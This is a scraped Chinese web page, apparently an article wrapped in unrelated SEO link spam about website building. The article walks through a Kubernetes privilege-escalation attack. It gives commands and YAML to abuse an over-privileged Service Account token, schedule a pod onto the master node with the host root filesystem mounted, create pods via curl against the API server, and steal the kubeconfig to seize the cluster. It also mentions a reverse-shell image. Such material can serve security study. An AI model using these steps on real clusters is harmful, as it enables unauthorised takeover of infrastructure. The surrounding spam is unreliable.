当前位置: 首页 > news >正文

重庆推广一个网站WordPress自定义类排序

news 2025/11/24 17:37:01
重庆推广一个网站,WordPress自定义类排序,餐饮类网站模板,网站关键字排名01、概述 Service Account本质是服务账号#xff0c;是Pod连接K8s集群的凭证。在默认情况下#xff0c;系统会为创建的Pod提供一个默认的Service Account#xff0c;用户也可以自定义Service Account#xff0c;与Service Account关联的凭证会自动挂载到Pod的文件系统中。 … 01、概述 Service Account本质是服务账号是Pod连接K8s集群的凭证。在默认情况下系统会为创建的Pod提供一个默认的Service Account用户也可以自定义Service Account与Service Account关联的凭证会自动挂载到Pod的文件系统中。 当攻击者通过某个web应用获取到一个Pod权限时如果RBAC权限配置不当Pod关联的Service Account拥有创建Pod的权限。攻击者就可以使用污点容忍的方式将挂载根目录的恶意Pod调度到Master节点获取Master 节点上的 kubeconfig 文件从而直接接管整个集群。 02、攻击场景 1Service Account赋予bypass对test名称空间拥有管理员权限。 kubectl create serviceaccount bypass -n test kubectl create rolebinding sa-admin --clusterrolecluster-admin --serviceaccounttest:bypass -n test kubectl get pod --assystem:serviceaccount:test:bypass 2在Pod中使用自定义的Service Account。 # pod-sa.yaml apiVersion: v1 kind: Pod metadata:name: pod-sanamespace: test spec:serviceAccountName: bypasscontainers:- name: ubuntuimage: ubuntu:20.04command: [/bin/sh,-c,sleep 24h] 3在Pod创建时Service Account关联的凭证会挂载到 /var/run/secrets/kubernetes.io/serviceaccount/ 目录其中ca.crt是证书、namespace是Pod所属的命名空间token是访问API Server的令牌 。 03、攻击过程 1攻击方式kubectl 命令行操作 在Pod中下载kubectl命令行工具使用kubectl auth检查权限拥有当前名称空间中所有执行操作的权限这就具备了获取集群权限的条件。 编写一个yaml文件将节点的根目录挂载到容器的/data 目录使用污点容忍度创建恶意Pod来对Master节点进行横向控制。 如下图将构建的Pod成功调度到Mater节点。 yaml文件内容 apiVersion: v1 kind: Pod metadata:name: pod1 spec:nodeSelector:node-role.kubernetes.io/master: tolerations:- key: node-role.kubernetes.io/masteroperator: Existseffect: NoSchedulecontainers:- image: nginx:1.20name: pod1volumeMounts:- mountPath: /dataname: datavolumes:- name: datahostPath:path: / 攻击者成功窃取 kubeconfig 文件将获得对 Kubernetes 集群的完全控制权限从而能够任意操控和管理整个集群。 2攻击方式curl 命令操作 首先创建一个包含恶意代码的镜像,用于反弹Shell利用curl 命令操作 Kubernetes API创建Pod。 TOKEN$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)用curl创建pod curl -k --header Authorization: Bearer $TOKEN \ -H Content-Type: application/yaml \ -s -w 状态码是:%{http_code}\n \ -d $(cat /tmp/111.yaml) \https://10.96.0.1/api/v1/namespaces/test/pods/ 远程监听端口来接收Master节点创建的Pod反弹的shell连接成功获取到kubeconfig文件。
http://www.zqtcl.cn/news/980856/

相关文章:

  • 南通制作网站的有哪些公司吗sae 部署wordpress
  • 友情链接对网站的影响wordpress admin init
  • 渭南网站开发做网红用哪个网站
  • 湖北建设网站wordpress 翻页电子书
  • 网站设计命名规范厦门建站比较好的公司
  • 用vs2010做网站登入前端培训费用大概多少郑州
  • 网站建设后的效果评估杭州网站制作公司
  • 3网站建设公司影楼修图用什么软件
  • 手机网站的内容模块多用户商城开源左
  • 库尔勒网站建站宝盒合作
  • 五河网站建设哪家好wordpress获取文章作者
  • 怎么修改网站内容wordpress ajax接口
  • 绵阳市城乡建设和规划局网站重庆网站建设公司有哪些
  • 宿迁网站建设公司排名展厅设计企业
  • 做家具定制的设计网站开阿里巴巴网站建设流程
  • 站长统计软件广州免费核酸在哪里做
  • 做soho一定要做网站吗在百度网站备案查询上显示未备案是什么意思
  • 移动公司营销网站设计html旅游网站模板
  • 专业生产车间设计图纸网站ui设计师证
  • 如何建网站教程视频10种网络营销方法
  • 网站内链优化的角度wordpress缓存插件破解版
  • 南宁网站建设哪个好天津网站建设咨询
  • 网站开发常用中间件计算机语言python
  • 学习html5的网站软件系统开发怎样容易
  • 做企业网站用什么华为弹性云服务器创建wordpress
  • 重庆手机网站开发网站建设的条件是什么
  • 舟山建设网站公司wordpress的总结
  • 如何做com的网站做网站设计学那个专业好
  • 中山如何建设网站如何安装wordpress模板
  • 如何搭建自己得网站树状wordpress主题